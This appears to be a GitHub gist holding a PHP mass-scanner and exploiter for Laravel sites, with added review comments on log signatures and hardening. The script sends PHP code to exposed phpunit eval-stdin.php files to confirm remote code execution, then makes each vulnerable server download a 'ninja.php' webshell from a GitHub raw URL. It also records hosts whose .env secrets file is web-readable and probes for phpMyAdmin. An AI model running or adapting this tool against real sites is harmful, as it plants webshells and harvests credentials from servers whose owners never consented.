@zelsaddr
Last active January 17, 2020 08:14
laravel eval stdin exploiter & env checker
<?php
# NOTE(review): error_reporting(0) silences every warning and notice for the
# whole run -- failed get_headers()/curl calls, undefined array offsets, etc.
# A probe that fails for network reasons is therefore indistinguishable in the
# output from a "not found" result.
error_reporting(0);
#LARAVEL EXPLOITER v1#
# BY FB/www.zeldin.go.id [ SECURITY GHOST ] #
# Local output file: one URL per line for every host whose .env returned 200.
# uniqid() makes the name unique per run; the main loop appends to it.
define("SAVED_FILE", "envscanner".uniqid().".txt");
# Sends a single HTTP POST to $site whose body is a PHP snippet and returns the
# raw response body (curl_exec's string, or false on failure). An exposed
# phpunit eval-stdin.php executes such a body server-side, which is the whole
# point of this tool. From the defender's side the request signature is a POST
# to a path under vendor/phpunit/ whose body starts with "<?php", sent with the
# fixed Firefox 67 User-Agent below.
#   $test 1 -> body echoes 'vuln'; the caller compares the response to "vuln"
#   $test 2 -> copy() a remote file into ninja.php in the script's cwd
#   $test 3 -> file_put_contents() writes the literal URL string into ninja.php
#   other   -> same body as case 2
# A file named ninja.php under the phpunit path, or a request for the
# raw.githubusercontent.com URL in egress logs, are the artefacts to look for
# on a host that received these requests.
function test($site, $test = 1){
switch($test){
case 1 :
$postFields = "<?php echo('vuln'); ?>";
break;
case 2 :
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>";
break;
case 3 :
$postFields = "<?php file_put_contents('ninja.php', 'https://raw.githubusercontent.com/rintod/ninja/master/ninja.php'); ?>";
break;
default :
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>";
break;
}
$ch = curl_init();
$options = array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
# Raw string body, so the request is sent as-is (no form encoding).
CURLOPT_POSTFIELDS => $postFields,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
# TLS verification is disabled, so targets with self-signed or invalid
# certificates are still contacted.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
# Hard 7-second connect and total timeouts; a slow host simply yields false.
CURLOPT_CONNECTTIMEOUT => 7,
CURLOPT_TIMEOUT => 7
);
curl_setopt_array($ch, $options);
return curl_exec($ch);
}
# Requests $domain1 with get_headers() and returns the three-character status
# code sliced out of the first status line ("HTTP/1.1 200 OK" -> "200").
# The slice assumes a 9-character "HTTP/1.x " prefix. When get_headers() fails
# it returns false, $headers[0] is null and the result is an empty string,
# which every caller's comparison against 200/"200" treats as "not found".
# NOTE(review): get_headers() follows redirects by default, so the code
# reported is presumably that of the final response, not the first -- confirm
# if this distinction matters for log correlation.
function get_http_response_code($domain1) {
$headers = get_headers($domain1);
return substr($headers[0], 9, 3);
}
# Probes for an exposed Laravel .env file: captures everything before the LAST
# occurrence of "vendor" in $site (the (.*) group is greedy) and requests that
# prefix followed by ".env". Returns the status-code string from
# get_http_response_code(). A reachable .env normally contains application
# secrets, which is why the main loop records hits; the mitigation is to keep
# .env outside the document root and deny it in the web server configuration.
function env($site){
preg_match('#(.*)vendor#si', $site, $url);
$check = get_http_response_code($url[1].".env");
return $check;
}
# Splits $site at the FIRST occurrence of "vendor" (the (.*?) group is
# non-greedy) and returns preg_match's result array: [0] is the text up to and
# including "vendor", [1] is the prefix before it. Callers use [0] as the base
# onto which "/phpunit/phpunit/src/Util/PHP/..." is appended.
# If $site contains no "vendor" the returned array is empty; the main loop only
# calls this after a strpos() check, so that case is not reached from there.
function uri($site){
preg_match('#(.*?)vendor#si', $site, $url);
return $url;
}
# Main loop. Reads the path of a target-list file from STDIN, then for every
# line containing "vendor" probes, in order: the phpunit eval-stdin.php file,
# a POST-based execution check, two attempts to drop ninja.php, a .env file,
# and a /phpmyadmin/ page. Server-side this leaves a recognisable trail in
# access logs -- GET for .../vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,
# POST(s) to the same path with a "<?php" body, GET(s) for .../ninja.php, GET
# for /.env and for /phpmyadmin/, all within a few seconds from one client.
# Hardening that defeats every step here: install without dev dependencies in
# production, deny direct web access to vendor/, and keep .env out of the
# document root.
echo "# LIST : "; $flist = trim(fgets(STDIN));
if(!is_file($flist) || !file_exists($flist)){
die("No url file list\n");
}
# Split strictly on CRLF: a file with LF-only line endings is read as a single
# entry, and only its first line's host is used.
$list = explode("\r\n", file_get_contents($flist));
foreach($list as $key => $target){
# strpos() result is used as a truthy value, so "vendor" at offset 0 counts as
# absent; in practice every line is a full URL starting with a scheme.
if(strlen($target) > 0 && strpos($target, 'vendor')){
# Host name = third "/"-separated segment; assumes "scheme://host/...".
$site = explode('/', $target)[2];
echo ">>>>>>>>>> START [ ".$key." ] EXPLOITER <<<<<<<<<\n";
echo "\t>> TARGET : ".$site."\n";
echo "\t>> SCANNING TARGET HAS AN RCE FILE OR NOT : ";
# Existence check for the phpunit dev-only script via a plain GET. The "200"
# string is compared loosely against int 200 here; an empty string (request
# failed) does not match.
if(get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php") == 200){
echo "{!} RCE FILE AVAILABLE {!}\n";
echo "\t{!} START TESTING {!} \n";
sleep(2);
echo "\t>> TESTING VULN MESSAGE\n";
echo "\t>> RESULT : ";
# Execution check: a response body of exactly "vuln" means the POSTed PHP ran.
if(test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 1) == "vuln"){
echo "VULN\n";
echo "\t>> SITE SHELL CHECK : ".uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php"."\n";
echo "\t>> TESTING WITH COPY EXTENSION WEBSHELL & CHECK\n";
# Two drop attempts (copy(), then file_put_contents()), each followed by a
# GET for ninja.php whose status code is printed but not acted on.
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 2);
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n";
echo "\t>> TESTING WITH FILE PUT CONTENTS FUNCTION & CHECK\n";
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 3);
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n";
}else{
echo "NOT VULN\n";
}
}else{
echo "{~} RCE FILE NOT AVAILABLE {~}\n";
}
echo "\t>> CHECK HAS A ENV FILE OR NOT\n";
# Greedy match (last "vendor"), the same split env() performs internally;
# $url[1] is reused below for the log line and the SAVED_FILE record.
preg_match('#(.*)vendor#si', $target, $url);
echo "\t>> ENV CHECK URL : ".$url[1].".env\n";
echo "\t>> RESULT : ";
if(env($target) == "200"){
# Record every host whose .env is web-readable (one URL per line).
file_put_contents(SAVED_FILE, $url[1].".env\n", FILE_APPEND);
echo $site." [ HAS ENV ]\n";
echo "\t>> CHECK PHPMYADMIN PAGE : ";
# Always probed over plain http:// regardless of the target's scheme.
echo get_http_response_code("http://".$site."/phpmyadmin/") == "200" ? "HAS PHPMYADMIN PAGE\n" : "PHPMYADMIN PAGE NOT FOUND\n";
}else{
echo $site." [ ENV NOT FOUND ]\n";
}
echo ">>>>>>>>>>>>>>>>>>> DONE <<<<<<<<<<<<<<<<<<<\n\n";
}else{
$site = explode('/', $target)[2];
echo ">> SKIPPING SITE : ".$site." ~ REASON : VENDOR URL NOT DETECTED.\n";
}
# Fixed one-second pause between targets.
sleep(1);
}
?>